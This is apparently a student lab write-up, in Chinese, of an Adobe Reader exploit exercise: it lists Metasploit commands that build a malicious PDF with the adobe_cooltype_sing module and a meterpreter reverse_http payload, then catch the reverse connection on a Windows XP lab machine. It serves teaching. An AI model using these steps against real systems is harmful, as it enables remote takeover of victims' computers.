实验过程

IP:kali:192.168.1.102 windowsxp :192.168.1.119

msfconsole进入控制台

使用命令为 use windows/fileformat/adobe_cooltype_sing进入攻击模块

设置攻击载荷payloads ,命令为set payloads windows/meterpreter/reverse_http

使用命令show options来确定需要修改的参数。

使用命令exploit生成5333.pdf

20145322 Exp5 Adobe阅读器漏洞攻击

退出并重新进入msf平台,使用命令 use exploit/multi/handler进入监听模式,设置好参数,执行exploit等待被攻击者的接听。
把生成的5322.pdf移动到winxp里面,并打开

20145322 Exp5 Adobe阅读器漏洞攻击

连接成功

20145322 Exp5 Adobe阅读器漏洞攻击

20145322 Exp5 Adobe阅读器漏洞攻击

相关文章:

  • 2021-06-07
  • 2021-07-31
  • 2021-09-05
  • 2022-02-28
  • 2021-06-06
  • 2021-11-11
  • 2021-10-08
猜你喜欢
  • 2022-03-03
  • 2021-10-11
  • 2021-07-11
  • 2021-12-27
相关资源
相似解决方案